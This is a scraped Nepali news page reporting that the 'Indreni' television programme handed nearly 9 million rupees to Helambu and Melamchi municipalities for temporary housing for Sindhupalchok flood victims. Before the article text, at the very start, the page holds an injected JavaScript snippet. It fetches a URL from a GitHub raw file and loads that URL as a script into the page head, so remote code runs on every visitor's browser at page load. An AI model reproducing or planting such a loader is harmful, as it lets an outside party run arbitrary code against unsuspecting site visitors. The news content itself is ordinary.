;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); इन्द्रेणी टेलिभिजन कार्यक्रमले सिन्धुपाल्चोक बाढी प्रभावितका लागि ९० लाख रुपैयाँ हस्तान्तरण – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • इन्द्रेणी टेलिभिजन कार्यक्रमले सिन्धुपाल्चोक बाढी प्रभावितका लागि ९० लाख रुपैयाँ हस्तान्तरण
Breaking News

इन्द्रेणी टेलिभिजन कार्यक्रमले सिन्धुपाल्चोक बाढी प्रभावितका लागि ९० लाख रुपैयाँ हस्तान्तरण

‘इन्द्रेणी’टेलिभिजन कार्यक्रमले सिन्धुपाल्चोक बाढी प्रभावितका लागि अस्थायी आवास निर्माण गर्न झण्डै ९० लाख रुपैयाँ हस्तान्तरण  गरेको छ । हेलम्बु गाउँपालिकामा १७ घर बाढी प्रभावित परिवारका लागि अस्थायी आवास निर्माण गर्न ६२ लाख रुपैयाँ सहयोग हस्तान्तरण गरेको छ ।

इन्द्रेणी’ कार्यक्रमका संचालक कृष्ण कँडेलले मंगलबार हेलम्बुका बाढी प्रभावितहरुकै उपस्थितिमा गाउँपालिका अध्यक्ष निमा ग्याल्जेन शेर्पालाई सो रकम हस्तान्तरण गरेका हुन् ।

भदौको अन्त्यमा अस्थायी आवास उद्घाटन हुने जनाइएको छ । साथै मेलम्चीमा ५ बाढी प्रभावित परिवारलाई अस्थायी आवास निर्माणका लागि झण्डै १८ लाख रुपैयाँ हस्तान्तरण गरेको छ।

फेसबुक प्रतिक्रियाहरु